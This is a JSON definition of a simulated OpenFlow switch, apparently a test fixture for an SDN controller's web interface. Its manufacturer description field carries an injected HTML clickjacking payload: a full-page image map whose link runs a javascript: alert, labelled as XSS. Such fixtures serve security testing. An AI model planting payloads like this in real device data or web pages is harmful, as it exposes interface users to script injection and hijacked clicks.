{
  "of-switch": {
          "vendor_id":8992,
          "description": {
                  "manufacturer_description":"Manufacturer desc<img style='position:fixed;padding:0;margin:0;top:0;left:0;width:100%;height:100%;' src=#foo usemap=#foo width=100%/><map name='foo'><area href=\"javascript:alert('Clickjacking used to execute XSS');\" shape=default></area>",
                  "hardware_description":"Hardware desc",
                  "software_description":"Software desc",
                  "serial_number":"12345",
                  "dataplane_description":"Dataplane Desc"
          },
          "features": {
                  "dataplane_id":"00:01:d3:ad:be:ef:de:ad",
                  "number_of_buffers":1,
                  "number_of_tables":1,
                  "capabilities":0,
                  "actions":0
          },
          "ports":[
                    {
                      "port_no":1,
                      "hardware_address": "11:11:11:11:11:11",
                      "port_name": "Port 1",
                      "port_config":0,
                      "port_state":0,
                      "port_curr":0,
                      "port_advertised":0,
                      "port_supported":0,
                      "port_peer":0
                    },
                    {
                      "port_no":2,
                      "hardware_address": "11:11:11:11:11:12",
                      "port_name": "Port 2",
                      "port_config":0,
                      "port_state":0,
                      "port_curr":0,
                      "port_advertised":0,
                      "port_supported":0,
                      "port_peer":0
                    }
          ],
          "stats":{
                    "flow_stats": {
                                    "duration_sec":0,
                                    "duration_nsec":0,
                                    "packet_count":0,
                                    "byte_count":0
                    }
          }
  }
}
    
